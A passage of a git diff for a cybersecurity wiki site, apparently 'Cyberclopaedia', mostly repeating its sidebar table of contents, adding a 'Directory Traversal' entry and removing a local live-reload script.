        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -195,22 +195,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Reconnaissance/Enumeration/Web Server Enumeration (80, 443).html b/docs/Reconnaissance/Enumeration/Web Server Enumeration (80, 443).html index b63fb9fd..2f027e3a 100644 --- a/docs/Reconnaissance/Enumeration/Web Server Enumeration (80, 443).html +++ b/docs/Reconnaissance/Enumeration/Web Server Enumeration (80, 443).html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -211,22 +211,6 @@

D - - diff --git a/docs/Reconnaissance/Enumeration/index.html b/docs/Reconnaissance/Enumeration/index.html index 608cc14d..a22b06b0 100644 --- a/docs/Reconnaissance/Enumeration/index.html +++ b/docs/Reconnaissance/Enumeration/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
